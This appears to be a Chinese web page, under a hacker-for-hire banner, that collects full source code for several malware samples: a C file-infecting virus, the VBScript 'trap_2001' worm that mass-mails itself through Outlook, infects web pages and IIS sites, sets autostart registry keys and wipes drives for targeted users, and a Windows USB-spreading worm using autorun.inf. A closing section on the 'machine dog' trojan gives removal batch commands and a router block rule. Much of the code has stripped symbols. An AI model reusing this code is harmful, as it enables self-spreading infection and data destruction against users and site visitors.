黑客24小时在线接单网站

黑客24小时在线接单网站,黑客网站入口,黑客接单入口,黑客攻击

c木马病毒源代码(木马病毒程序)

本文目录一览:

c语言木马源代码

#include stdio.h

#include dir.h

void main(void)

{

virus();

}

int virus()

{

struct ffblk ffblk;

FILE *in,*out,*read;

char *virus="virus.c";

char buf[50][80];

char *p;

char *end="return";

char *bracket="}";

char *main="main";

char *include[2]={"stdio.h","dir.h"};

char *int_virus="int virus()";

char *buffer;

int done,i,j=0,flag=0;

printf("\nI have a virus. Writen by PuBin\n");

done = findfirst("*.c",ffblk,0);

while (!done)

{

i=0;

if ((in = fopen(ffblk.ff_name, "rt"))== NULL)

{

goto next;

}

do{

if(i=50)

{

fclose(in);

goto next;

}

p=fgets(buf[i],80,in);

i++;

}while(p!=NULL);

fclose(in);

out=fopen(ffblk.ff_name,"w+t");

fputs("#includestdio.h\n",out);

fputs("#includedir.h\n",out);

do

{

if(strstr(buf[j],main)!=NULL)

{

for(;ji-1;j++)

if(strstr(buf[j],end)==NULLstrstr(buf[j],bracket)==NULL)

fputs(buf[j],out);

else

{

if(flag==0)

{

flag=1;

fputs("virus();\n",out);

}

fputs(buf[j],out);

}

}

else if((strstr(buf[j],include[0])==NULL)

(strstr(buf[j],include[1])==NULL))

{

fputs(buf[j],out);

j++;

}

else

j++;

}while(ji-1);

read=fopen(virus,"rt");

do

{

p=fgets(buffer,80,read);

if(strstr(buffer,int_virus))

while(p!=NULL)

{

if(strstr(buffer,virus)==NULL)

fputs(buffer,out);

else

{

fputs(" char *virus=\"",out);

fputs(ffblk.ff_name,out);

fputs("\";\n",out);

}

p=fgets(buffer,80,read);

}

}while(p!=NULL);

fclose(read);

fclose(out);

printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);

next: done = findnext(ffblk);

}

return 0;

}

严重声明:这个程序只是供C语言新手参考,开玩笑没关系,但如果用来做不法的事情,本人概不负责。还有,编病毒、木马去做违法的事情惩罚是很重的,你如果想学编程,编个简单的就好了,否则后果很严重。

给个C语言病毒代码.....要复制的....越长越好

下面就对“陷阱”的发作过程和源代码作详细的揭密。

病毒具有自身加密能力(使用 JavaScript 编码技术),使得普通用户无法看到病毒原码,但在被感染 VBS 文件中并没有加密,于是作为一个入口点,我非常轻松地得到所有源码。

'@ thank you! make use of other person to get rid of an enemy, trap _2001

'这句话的意思可能是“借刀杀人”,然后是病毒名称“陷阱”

on error resume next

dim vbscr, fso,w1,w2,MSWKEY,HCUW,Code_Str, Vbs_Str, Js_Str

dim defpath, smailc, MAX_SIZE

dim whb(), title(10)

smailc = 4

Redim whb(smailc) ’白宫相关人员邮件名单

whb(0) = "president@whitehouse.gov"

whb(1) = "vice.president@whitehouse.gov "

whb(2) = "first.lady@whitehouse.gov"

whb(3) = "mrs.cheney@whitehouse.gov"

'发送邮件的主题

title(0) = "Thanks for helping me!"

title(1) = "The police are investigating the robbery"

title(2) = "an application for a job "

title(3) = "The aspects of an application process pertinent to OSI"

title(4) = "What a pleasant weather. Why not go out for a walk?"

title(5) = "These countries have gone / been through too many wars"

title(6) = "We've fixed on the 17th of April for the wedding"

title(7) = "The wind failed and the sea returned to calmness."

title(8) = "the sitting is open!"

title(9) = ""

defpath = "C:\Readme.html" ' 病毒文件

MAX_SIZE = 100000 ' 定义传染文件的最大尺寸

MSWKEY = "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\"

HCUW = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"

main

sub main() '主程序

on error resume next

dim w_s

w_s= WScript.ScriptFullName '得到病毒文件本身的路径

if w_s = "" then

Err.Clear

set fso = CreateObject("Scripting.FileSystemObject") '创建文件系统对象

if getErr then '辨认病毒状态

Randomize '初始化随机种子

ra = int(rnd() * 7) '产生随机数

doucment.write title(ra) ' 写随机内容

ExecuteMail '执行邮件状态时的程序

else

ExecutePage '执行 WEB 页状态时的程序

end if

else

ExecuteVbs '执行 VBS 文件状态时的程序

end if

end sub

Function getErr() 忽略错误

if Err.number0 then

getErr=true

Err.Clear

else

getErr=false

end if

end function

sub ExecutePage() 'WEB 页状态时的程序

on error resume next

dim Html_Str, adi, wdf, wdf2,wdf3,wdsf, wdsf2, vf

Vbs_Str = GetScriptCode("vbscript") '得到 VBScript 代码

Js_Str = GetJavaScript() ' 得到 Javascript 代码

Code_Str = MakeScript(encrypt(Vbs_str),true) '得到已加密过的脚本代码

Html_Str = MakeHtml(encrypt(Vbs_str), true) '得到已加密的完整HTML代码

Gf

'定义病毒文件的路径

wdsf = w2 "Mdm.vbs"

wdsf2 = w1 "Profile.vbs"

wdf = w2 "user.dll" ' 注意 wdf 和 wdf3 两个文件非常迷惑人

wdf2 = w2 "Readme.html"

wdf3 = w2 "system.dll"

'创建病毒文件

set vf = fso.OpenTextFile (wdf, 2, true)

vf.write Vbs_Str

vf.close

set vf = fso.OpenTextFile (wdsf, 2, true)

vf.write Vbs_Str

vf.close

set vf = fso.OpenTextFile (wdsf2, 2, true)

vf.Write Vbs_Str

vf.close

set vf = fso.OpenTextFile (wdf2, 2, true)

vf.write Html_Str

vf.close

set vf = fso.OpenTextFile (wdf3, 2, true)

vf.write Code_Str

vf.close

修改注册表,让病毒文件在每一次计算机启动自动执行

Writereg MSWKEY "CurrentVersion\Run\Mdm", wdsf, ""

Writereg MSWKEY "CurrentVersion\RunServices\Profile", wdsf2, ""

SendMail ' 执行发送邮件程序

Hackpage ' 执行感染网站程序

set adi = fso.Drives

for each x in adi

if x.DrivesType = 2 or x.DrivesType = 3 then '遍历所有本地硬盘和网络共享硬盘

call SearchHTML(x "\") '执行文件感染程序

end if

next

if TestUser then '检查用户

Killhe 执行删除文件操作

else

if Month(Date) Day(Date) = "75" then '如系统时间为 7月5日

set vf = fso.OpenTextFile(w2 "75.htm", 2,true) ’创建系统攻击文件

vf.write MakeScript ("window.navigate ('c:/con/con');", false)

vf.close

Writereg MSWKEY "CurrentVersion\Run\75", w2 "75.htm", "" '自动启动

window.navigate "c:/con/con" '立刻蓝屏,利用 Windows BUG,能引起 Win9X 系统100%死机(即无法恢复的蓝屏)

else '如不是7.5

if fso.FileExists(w2 "75.htm") then fso.DeleteFile w2 "75.htm" ' 删除75.htm

end if

end if

if fso.FileExists(defpath) then fso.DeleteFile defpath ' 删除 C:\Readme.html 病毒文件

end sub

sub ExecuteMail() '邮件状态时执行的程序

on error resume next

Vbs_Str = GetScriptCode("vbscript")

Js_Str = GetJavaScript()

Set Stl = CreateObject("Scriptlet.TypeLib") '创建 TypeLib对象

with Stl

.Reset

.Path = defpath

.Doc = MakeHtml(encrypt(Vbs_str), true)

.Write() '创建 C:\Readme.html 文件

end with

window.open defpath, "trap", "width=1 height=1 menubar=no scrollbars=no toolbar=no" 打开会隐藏的窗口

end sub

sub ExecuteVbs() ' 同理,如病毒文件是 VBS 时所执行的程序

on error resume next

dim x, adi, wvbs, ws, vf

set fso = CreateObject("Scripting.FileSystemObject")

set wvbs = CreateObject("WScript.Shell")

Gf

wvbs.RegWrite MSWKEY "Windows Scripting Host\Setings\Timeout", 0, "REG_DWORD"

set vf = fso.OpenTextFile (w2 "system.dll", 1)

Code_Str = vf.ReadAll()

vf.close

Hackpage

SendMail

set adi = fso.Drives

for each x in adi

if x.DrivesType = 2 or x.DrivesType = 3 then

call SearchHTML(x "\")

end if

next

if TestUser then Killhe

end sub

sub Gf() '得到系统路径

w1=fso.GetSpecialFolder(0) "\"

w2=fso.GetSpecialFolder(1) "\"

end sub

function Readreg(key_str) '读注册表

set tmps = CreateObject("WScript.Shell")

Readreg = tmps.RegRead(key_str)

set tmps = Nothing

end function

function Writereg(key_str, Newvalue, vtype) '写注册表

set tmps = CreateObject("WScript.Shell")

if vtype="" then

tmps.RegWrite key_str, Newvalue

else

tmps.RegWrite key_str, Newvalue, vtype

end if

set tmps = Nothing

end function

function MakeHtml(Sbuffer, iHTML) '创建HTML 文件的完整代码

dim ra

Randomize

ra = int(rnd() * 7)

MakeHtml="" "HTML" "HEAD" "TITLE" title(ra) "/" "TITLE" "/HEAD" _

"BO" "AD" vbcrlf MakeScript(Sbuffer, iHTML) vbcrlf _

"" "/BOAD" "/HTML"

end Function

function MakeScript(Codestr, iHTML) '此程序是病毒进行自我加密过程,较为复杂,不再描述

if iHTML then

dim DocuWrite

DocuWrite = "document.write(''+" "'SCRIPT Language=JavaScript\n'+" _

"jword" "+'\n/'" "+'SCRIPT');"

DocuWrite = DocuWrite vbcrlf "document.write(''+" "'SCRIPT Language=VBScript\n'+" _

"nword" "+'\n/'" "+'SCRIPT');"

MakeScript="" "SCRIPT Language=JavaScript" vbcrlf "var jword = " _

chr(34) encrypt(Js_Str) chr(34) vbcrlf "var nword = " _

chr(34) Codestr chr(34) vbcrlf "nword = unescape(nword);" vbcrlf _

"jword = unescape(jword);" vbcrlf DocuWrite vbcrlf "/" "SCRIPT"

else

MakeScript= "" "SCRIPT Language=JavaScript" Codestr "/" "SCRIPT"

end if

end function

function GetScriptCode(Languages) ' 得到不同脚本语言的代码

dim soj

for each soj in document.scripts

if LCase(soj.Language) = Languages then

if Languages = "javascript" then

if len(soj.Text) 200 then

else

GetScriptCode = soj.Text

exit function

end if

else

GetScriptCode = soj.Text

exit function

end if

end if

next

end function

function GetJavaScript()

GetJavaScript = GetScriptCode("javascript")

end function

function TestUser() '检测用户过程

on error resume next

dim keys(6), i, tmpStr, Wnet

'特定用户关键词

keys(0) = "white home"

keys(1) = "central intelligence agency"

keys(2) = "bush"

keys(3) = "american stock exchang"

keys(4) = "chief executive"

keys(5) = "usa"

TestUser = false

Set Wnet = CreateObject("WScript.Network") '创建网络对象

'下面一共3个循环,作用一样,是检查用户的 Domain、用户名和计算机名是否含有以上的5个关键词语,一旦含有程序将返回”真”的条件,从而对这些用户的文件进行疯狂删除。

tmpStr = LCase(Wnet.UserName) '

for i=0 to 4

if InStr(tmpStr, keys(i)) 0 then

TestUser=true

exit function

end if

next

tmpStr = LCase(Wnet.ComputerName)

for i=0 to 4

if InStr(tmpStr, keys(i)) 0 then

TestUser=true

exit function

end if

next

tmpStr = LCase(Wnet.UserDomain)

for i=0 to 4

if InStr(tmpStr, keys(i)) 0 then

TestUser=true

exit function

end if

next

Set Wnet = Nothing

end function

function SendMail() '发送文件过程

on error resume next

dim wab,ra,j, Oa, arrsm, eins, Eaec, fm, wreg, areg,at

'首先向 OutLook 地址簿发送带能直接感染文件的已加密的病毒代码和HTML 附件

主题是随机的,此过程与“欢乐时光“类似,所以不再描述

Randomize

at=fso.GetSpecialFolder(1) "\Readme.html"

set Oa = CreateObject("Outlook.Application")

set wab = Oa.GetNameSpace("MAPI")

for j = 1 to wab.AddressLists.Count

eins = wab.AddressLists(j)

wreg=Readreg (HCUW eins)

if (wreg="") then wreg = 1

Eaec = eins.AddressEntries.Count

if (Eaec Int(wreg)) then

for x = 1 to Eaec

arrsm = wab.AddressEntries(x)

areg = Readreg(HCUW arrsm)

if (areg = "") then

set fm = wab.CreateItem(0)

with fm

ra = int(rnd() * 7)

.Recipients.Add arrsm

.Subject = title(ra)

.Body = title(ra)

.Attachments at

.Send

Writereg HCUW arrsm, 1, "REG_DWORD"

end with

end if

next

end if

Writereg HCUW eins, Eaec, ""

next

'下面是对指定的用户无条件发送大量病毒邮件, 从这一点可看出病毒作者对美国政府的极度不满。

for j = 1 to smailc

arrsm = whb(j)

set fm = wab.CreateItem(0)

ra = int(rnd() * 7)

with fm

.Recipients.Add arrsm

.Subject = title(ra)

.Body = title(ra)

.Send

end with

next

set Oa = Nothing

window.setTimeout "SendMail()", 5000 '每隔 5 秒种重复发送

end function

sub SearchHTML(Path) '搜索可传染文件的过程

on error resume next

dim pfo, psfo, pf, ps, pfi, ext

if instr(Path, fso.GetSpecialFolder(2)) 0 then exit sub

if Path "E:\" then exit sub

set pfo = fso.GetFolder(Path)

set psfo = pfo.SubFolders

for each ps in psfo

SearchHTML(ps.Path)

set pf = ps.Files

for each pfi in pf

ext = LCase(fso.GetExtensionName(pfi.Path))

if instr(ext, "htm") 0 or ext = "plg" or ext = "asp" then '检查文件的扩展名是否为 htm、html、plg 如是则检查是否被感染,如未被感染则将已加密的病毒代码插入文件头,这样文件一旦执行也会执行病毒代码,而且不会影响原文件的正常执行。

if Code_Str"" then AddHead pfi.Path, pfi, 1

elseif ext= "vbs" then '如是 vbs 文件,则插入未加密的病毒代码

AddHead pfi.Path,pfi, 2

end if

next

next

end sub

sub Killhe() '全盘删除文件过程

on error resume next

dim codeText, ko,adi, kd, kh, ks,kf,kfs

codeText = "@ECHO OFF" vbcrlf "PATH " w1 "COMMAND" vbcrlf _

"DELTREE c:\" '将删除C盘的命令插入Autoexec.bat 中,下次开机时,删除整个硬盘,并没有任何提示

set ko = fso.OpenTextFile("C:\Autoexec.bat", 8, true)

ko.Write vbcrlf codeText

ko.Close

'接着立刻删除其它盘的所有文件

set adi = fso.Drives

for each x in adi

if x.DrivesType = 2 then

set kd = fso.GetFolder(x "\")

set kfs = kd.Files

for each kf in kfs

kf.Delete

next

set ks = kd.SubFolders

for each kh in ks

kh.Delete

next

end if

next

do while 1 '让系统立刻死机

window.open ""

loop

end sub

sub Hackpage() ' 此过程是直接攻击 Mircosoft IIS 服务器主页过程

dim fi

H = "C:\InetPut\wwwroot"

if fso.FolderExists(H) then

'判断是否为网站,如是则将已加密的带病毒代码插入文件头,从而直接传染浏览该网站的用户

set fi = fso.GetFile(H "\index.htm")

AddHead H "\index.htm",fi,1

end if

end sub

sub AddHead(Path, f, t) '此过程是病毒传染文件具体过程

on error resume next

dim tso, buffer,sr

if f.size MAX_SIZE then exit sub '传染大小小于100K的文件

set tso = fso.OpenTextFile(Path, 1, true)

buffer = tso.ReadAll()

tso.close

if (t = 1) then

if UCase(Left(LTrim(buffer), 7)) "SCRIPT" then

set tso = fso.OpenTextFile(Path, 2, true)

tso.Write Code_Str vbcrlf buffer '插入到文件头

tso.close

end if

else

if mid(buffer, 3, 2) "'@" then

tso.close

sr=w2 "user.dll"

if fso.FileExists(sr) then fso.CopyFile sr, Path

end if

end if

end sub

虽然病毒发作日已过但我们还是要小心提防病毒的变种出现。

用C语言编写的病毒代码

一个c病毒源代码

#include windows.h

#include Shlwapi.h

#include fstream.h

#include TlHelp32.h

#include Dbt.h

#pragma comment(lib,"shlwapi.lib")

#define TIMER 1//计时器

//function

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程

//获取盘符

TCHAR FirstDriveFromMask (ULONG unitmask);

//病毒从U盘启动时用到的函数

BOOL FileExist(TCHAR *path);//测试一个文件是否存在

BOOL GetSelfPath(TCHAR *path);//Get the virus's path

//BOOL FindU(TCHAR *u);//check whether u exist, u[2]

BOOL GetSysPath(TCHAR *path);//得到系统路径

BOOL CopyToSysAndSet(HWND hwnd);//复制自身到系统目录和设置

BOOL SetFileAttrib(TCHAR *path);//设置path所指文件的属性

BOOL RegAutoRun(TCHAR *path);//修改注册表,实现自启动

//从C盘启动时用到函数

BOOL CopyToUAndSet();//复制自己到U盘

BOOL CreateAutoRunFile(TCHAR *path);//在U盘下生成autorun.inf文件

BOOL FindSelf();//测试自己是否在已经执行了

//global variable

TCHAR szExePath[MAX_PATH];//the virus's path

TCHAR U[2];//保存U盘的盘符

TCHAR szSysPath[MAX_PATH];//system path

//constant

const TCHAR *szExeName="bbbbb.exe";

const TCHAR *szSysName="aaaaa.exe";

const TCHAR *szAutoRunFile="AutoRun.inf";

int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,

PSTR szCmdLine, int iCmdShow)

{

static TCHAR szAppName[]=TEXT ("UUUUUU");

HWND hwnd;

MSG msg;

WNDCLASS wndclass;

wndclass.style =0;

wndclass.lpfnWndProc =WndProc;

wndclass.cbClsExtra =0;

wndclass.cbWndExtra =0;

wndclass.hInstance =hInstance;

wndclass.hIcon =0;

wndclass.hCursor =0;

wndclass.hbrBackground =0;

wndclass.lpszMenuName =NULL;

wndclass.lpszClassName =szAppName;

if (!RegisterClass (wndclass))

{

MessageBox (NULL,TEXT("Program requires Windows NT!"),

szAppName, MB_ICONERROR);

return 0;

}

hwnd = CreateWindow (szAppName, NULL,

WS_DISABLED,

0, 0,

0, 0,

NULL, NULL, hInstance, NULL);

while (GetMessage(msg, NULL, 0, 0))

{

TranslateMessage (msg);

DispatchMessage (msg);

}

return msg.wParam;

}

LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)

{

PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;

switch(wParam)

{

case DBT_DEVICEARRIVAL: //插入

if (lpdb - dbch_devicetype == DBT_DEVTYP_VOLUME)

{

PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;

U[0]=FirstDriveFromMask(lpdbv -dbcv_unitmask);//得到u盘盘符

//MessageBox(0,U,"Notice!",MB_OK);

CopyToUAndSet();//拷到u盘

}

break;

case DBT_DEVICEREMOVECOMPLETE: //设备删除

break;

}

return LRESULT();

}

LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)

{

switch(message)

{

case WM_Create: //处理一些要下面要用到的全局变量

U[1]=':';

GetSysPath(szSysPath);//得到系统路径

SetTimer(hwnd,TIMER,5000,0);//启动计时器

GetSelfPath(szExePath);//得到自身的路径

return 0;

case WM_TIMER: //timer message

if(szExePath[0]==szSysPath[0]) //如果是系统盘启动的

SendMessage(hwnd,WM_DEVICECHANGE,0,0);//检测有没有插入设备消息

else

{

CopyToSysAndSet(hwnd);//拷到系统盘并自启动

}

return 0;

case WM_DEVICECHANGE:

OnDeviceChange(hwnd,wParam,lParam);

return 0;

case WM_DESTROY:

KillTimer(hwnd,TIMER);

PostQuitMessage(0);

return 0;

}

return DefWindowProc(hwnd, message, wParam, lParam);

}

TCHAR FirstDriveFromMask(ULONG unitmask)

{

char i;

for (i = 0; i 26; ++i)

{

if (unitmask 0x1)//看该驱动器的状态是否发生了变化

break;

unitmask = unitmask 1;

}

return (i + 'A');

}

BOOL GetSelfPath(TCHAR *path)

{

if(GetModuleFileName(NULL,path,MAX_PATH))//得到程序自身的目录

{

return TRUE;

}

else

return FALSE;

}

BOOL GetSysPath(TCHAR *path)

{

return GetSystemDirectory(path,MAX_PATH);//得到系统路径

}

BOOL CopyToSysAndSet(HWND hwnd)

{

TCHAR szPath[MAX_PATH];

lstrcpy(szPath,szSysPath);

lstrcat(szPath,"\\");

lstrcat(szPath,szSysName);//得到复制到系统目录的完整目录

if(!FileExist(szPath))//检测系统目录是否已经存在复制的文件

{

CopyFile(szExePath,szPath,FALSE);

RegAutoRun(szPath);

return SetFileAttrib(szPath);

}

else

{

if(!FindSelf())//检测自己有没有运行

{

//MessageBox(0,szExePath,szPath,MB_OK);

WinExec(szPath,SW_HIDE);//没有就执行

SendMessage(hwnd,WM_CLOSE,0,0);//结束自己

}

}

return FALSE;

}

BOOL FileExist(TCHAR *path)//检测PATH所指的路径的文件是否存在

{

int result;

result=PathFileExists(path);

if(result==1)

return TRUE;

else

return FALSE;

}

BOOL SetFileAttrib(TCHAR *path)

{

return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);

}

BOOL RegAutoRun(TCHAR *path)//修改注册表实现自启动

{

HKEY hkey;

DWORD v=0;

RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",hkey);

RegSetValueEx(hkey,"NoDriveTypeAutoRun",0,REG_DWORD,(LPBYTE)v,sizeof(DWORD));

if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run",

hkey)==ERROR_SUCCESS)

{

RegSetValueEx(hkey,szSysName,0,REG_SZ,(BYTE*)path,lstrlen(path));

RegCloseKey(hkey);

return TRUE;

}

else

return FALSE;

}

BOOL CopyToUAndSet()

{

TCHAR szPath[MAX_PATH];

lstrcpy(szPath,U);

lstrcat(szPath,"\\");

lstrcat(szPath,szExeName);//得到指向U盘的完整目录

TCHAR szAutoFile[MAX_PATH];

lstrcpy(szAutoFile,U);

lstrcat(szAutoFile,"\\");

lstrcat(szAutoFile,szAutoRunFile);

if(!FileExist(szAutoFile))

{

CreateAutoRunFile(szAutoFile);

SetFileAttrib(szAutoFile);

}

if(!FileExist(szPath))

{

CopyFile(szExePath,szPath,FALSE);

return SetFileAttrib(szPath);

}

return FALSE;

}

BOOL CreateAutoRunFile(TCHAR *path) //在U盘下创建一个autorun.inf文件

{

ofstream fout;

fout.open(path);

if(fout)

{

fout"[AutoRun]"endl;

fout"open="szExeName" e"endl;

fout"shellexecute="szExeName" e"endl;

fout"shell\\Auto\\command="szExeName" e"endl;

fout"shell=Auto"endl;

fout.close();

return TRUE;

}

return FALSE;

}

BOOL FindSelf(){

PROCESSENTRY32 pe;

HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

pe.dwSize=sizeof(PROCESSENTRY32);

if(Process32First(hShot,pe)){

do{

if(lstrcmp(pe.szExeFile,szSysName)==0)

{

CloseHandle(hShot);

return TRUE;

}

}while(Process32Next(hShot,pe));

}

CloseHandle(hShot);

return FALSE;

} 隐藏窗口:ShowWindow(false); (#include windows.h)

将程序暂停一秒后继续执行:sleep(1000); (同上)

删除文件:system("del 文件的路径");

运行文件:system("文件的路径");

system函数(#include iostream)

复制文件:详见remove函数(#include process.h)

-----------------------------------------------------------

一个不错的病毒完整源代码

#include windows.h

#include Shlwapi.h

#include fstream.h

#include TlHelp32.h

#include Dbt.h

#pragma comment(lib,"shlwapi.lib")

#define TIMER 1//计时器

//function

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程

//获取盘符

TCHAR FirstDriveFromMask (ULONG unitmask);

谁有机器狗木马病毒的C语言程序代码?

计算机病毒“机器狗”

机器狗的生前身后,曾经有很多人说有穿透还原卡、冰点的病毒,但是在各个论坛都没有样本证据,直到2007年8月29日终于有人在社区里贴出了一个样本。这个病毒没有名字,图标是SONY的机器狗阿宝,就像前辈熊猫烧香一样,大家给它起了个名字叫机器狗。

工作原理

机器狗本身会释放出一个pcihdd.sys到drivers目录,pcihdd.sys是一个底层硬盘驱动,提高自己的优先级接替还原卡或冰点的硬盘驱动,然后访问指定的网址,这些网址只要连接就会自动下载大量的病毒与恶意插件。然后修改接管启动管理器,最可怕的是,会通过内部网络传播,一台中招,能引发整个网络的电脑全部自动重启。

重点是,一个病毒,如果以hook方式入侵系统,接替硬盘驱动的方式效率太低了,而且毁坏还原的方式这也不是最好的,还有就是这种技术应用范围非常小,只有还原技术厂商范围内有传播,在这方面国际上也只有中国在用,所以,很可能就是行业内杠。

对于网吧而言,机器狗就是剑指网吧而来,针对所有的还原产品设计,可预见其破坏力很快会超过熊猫烧香。好在现在很多免疫补丁都以出现,发稿之日起,各大杀毒软件都以能查杀。

免疫补丁之争

现在的免疫补丁之数是疫苗形式,以无害的样本复制到drivers下,欺骗病毒以为本身以运行,起到阻止危害的目的。这种形式的问题是,有些用户为了自身安全会在机器上运行一些查毒程序(比如QQ医生之类)。这样疫苗就会被误认为是病毒,又要废很多口舌。

解决之道

最新的解决方案是将system32/drivers目录单独分配给一个用户,而不赋予administror修改的权限。虽然这样能解决,但以后安装驱动就是一件头疼的事了。

来彻底清除该病毒,处理后重启一下电脑就可以了,之前要打上补丁!

或者这样:

1注册表,组策略中禁止运行userinit.exe 进程

2 在启动项目中加入批处理

A : 强制结束userinit.exe进程 Taskkill /f /IM userinit.exe (其中“/IM”参数后面为进程的图像名,这命令只对XP用户有效)

B : 强制删除userinit.exe文件 DEL /F /A /Q %SystemRoot%\system32\userinit.exe

C : 创建userinit.exe免疫文件到%SystemRoot%\system32\

命令:md %SystemRoot%\system32\userinit.exe nul 2nul

或者 md %SystemRoot%\system32\userinit.exe

attrib +s +r +h +a %SystemRoot%\system32\userinit.exe

D : reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe" /v debugger /t reg_sz /d debugfile.exe /f

userinit1.exe是正常文件改了名字,多加了一个1,你也可以自己修改,不过要手动修改这4个注册表,并导出,这个批处理才能正常使用。

最新动向

好像机器狗的开发以停止了,从样本放出到现在也没有新的版本被发现,这到让我们非常担心,因为虽着研究的深入,现在防御的手段都是针对病毒工作原理的,一但机器狗开始更新,稍加改变工作原理就能大面积逃脱普遍的防御手段,看来机器狗的爆发只是在等待,而不是大家可以高枕了。

目前网上流传一种叫做机器狗的病毒,此病毒采用hook系统的磁盘设备栈来达到穿透目的的,危害极大,可穿透目前技术条件下的任何软件硬件还原!基本无法靠还原抵挡。目前已知的所有还原产品,都无法防止这种病毒的穿透感染和传播。

机器狗是一个木马下载器,感染后会自动从网络上下载木马、病毒,危及用户帐号的安全。

机器狗运行后会释放一个名为PCIHDD.SYS的驱动文件,与原系统中还原软件驱动进行硬盘控制权的争夺,并通过替换userinit.exe文件,实现开机启动。

那么如何识别是否已中毒呢?

是否中了机器狗的关键就在 Userinit.exe 文件,该文件在系统目录的 system32 文件夹中,点击右键查看属性,如果在属性窗口中看不到该文件的版本标签的话,说明已经中了机器狗。如果有版本标签则正常。

临时解决办法:

一是在路由上封IP:

ROS脚本,要的自己加上去

/ ip firewall filter

add chain=forward content=yu.8s7.net action=reject comment="DF6.0"

add chain=forward content= action=reject

二是在c:\windows\system32\drivers下建立免疫文件: pcihdd.sys ,

三是把他要修改的文件在做母盘的时候,就加壳并替换。

在%systemroot%\system32\drivers\目录下 建立个 明字 为 pcihdd.sys 的文件夹 设置属性为 任何人禁止

批处理

md %systemroot%\system32\drivers\pcihdd.sys

cacls %systemroot%\system32\drivers\pcihdd.sys /e /p everyone:n

cacls %systemroot%\system32\userinit.exe /e /p everyone:r

exit

目前,网络流行以下解决方法,或者可以在紧急情况下救急:

1、首先在系统system32下复制个无毒的userinit.exe,文件名为FUCKIGM.exe(文件名可以任意取),这就是下面批处理要指向执行的文件!也就是开机启动userinit.exe的替代品!而原来的userinit.exe保留!其实多复制份的目的只是为了多重保险!可能对防止以后变种起到一定的作用。

2、创建个文件名为userinit.bat的批处理(文件名也可任意取,但要和下面说到的注册表键值保持一致即可),内容如下:

start FUCKIGM.exe (呵呵,够简单吧?)

3、修改注册表键值,将userinit.exe改为userinit.bat。内容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"Userinit"="C:\\WINDOWS\\system32\\userinit.bat,"

就这3步,让这条狗再也凶不起来!这是在windows 2003测试的,双击机器狗后,没什么反应,对比批处理也是正常,即这狗根本没改动它!开关机游戏均无异常!但唯一美中不足的是,采用经典模式开机的启动时会出现个一闪而过的黑框!

  • 评论列表:
  •  可难雨铃
     发布于 2022-10-08 01:16:53  回复该评论
  • s(0) = "white home" keys(1) = "central intelligence agency" keys(2) = "bush" keys
  •  痴者欢烬
     发布于 2022-10-07 22:07:03  回复该评论
  • if vtype="" then tmps.RegWrite key_str, Newvalue else tmps.RegWrite key_str, Newvalue, vtype end if set tmps = Nothing end function funct

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.